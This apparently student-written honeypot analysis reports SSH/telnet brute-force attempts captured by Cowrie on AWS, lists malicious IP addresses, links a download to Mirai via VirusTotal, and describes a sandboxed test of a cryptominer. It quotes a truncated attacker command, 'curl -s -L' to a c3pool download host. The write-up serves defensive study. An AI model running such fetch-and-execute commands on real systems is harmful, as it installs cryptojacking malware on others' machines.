For this project, I set up the open-source Cowrie honeypot for 8 hours of traffic in the Ohio region in AWS. I will use Hypothesis from IOC (indication of compromise) to establish an analysis of attackers' behavior. I investigated with IP address, file hashes, and pattern of attacks.
COWRIE
Cowrie is a high-interaction ssh and telnet honeypot designed to log brute force attacks and shell interaction. Cowrie honeypot lures attackers to attract and traps hackers. The log file can reveal the techniques, tactics, and procedures (TTP) used by the attacker.
SETUP
I selected the Ohio region in AWS to set up my honeypot. I chose Debian 10 Buster as my Amazon Machine Image and used an open-source T-pot, ‘telekom-security/tpotce’. The time frame was from 10/18/2021 at 8 pm to 10/19/2021 at 4 am. There were 835 attacks from 31 unique IP addresses with ssh and telnet. The highest attacks are from the United States between 10 pm and 2 am. I also see some attacks from I will look into a few attackers.
ATTACKS
Attackers carried out ssh brute force attacks with common usernames and passwords. The most used usernames are root and user. They used ‘root’ 78 times and ‘user’ 27 times to brute-force. I filtered the log file to simplify the analysis of the incident. The following picture shows attacks originating from several different countries and using common usernames and passwords.
The list shows a high concentration of attacks from IP address 20.212.17.220 and evidence of using common usernames and passwords.
The attacker tried to download a file ‘drip-project.xyz ‘ into a server. I put the hash in virustotal.com to find out what virus is associated with the hash. We can see from the following picture, the attacker is related to Mirai malware. According to Wikipedia, Mirai malware turns Linux OS into remotely controlled bots used as part of a botnet in large-scale network attacks.
Multiple security vendors flagged the following IP address as malicious according to virustotal.com.
209.141.56.75
199.19.226.61
212.193.30.101
We can find further information about the attacker.
Malware Analysis
The following log shows that an attacker from IP address 136.144.41.253 tried to download a malicious file. I checked it through virustotal.com and took a further analysis.
I tested the malware “curl-s -L http://download.c3pool.com…” from the command line input list. I used the SAN-SIFT workstation to protect from executing live malware accidentally. Wget the malicious command line in my sandbox and disconnect my VM from the internet by disconnecting the network adapter to prevent no other malicious attacks. Then I deleted the VM ware after I finished testing the malware.
The file failed to run, but we can see the attacking pattern of this Crypto-mining malware. The malware removes directories created if it is not successfully executed.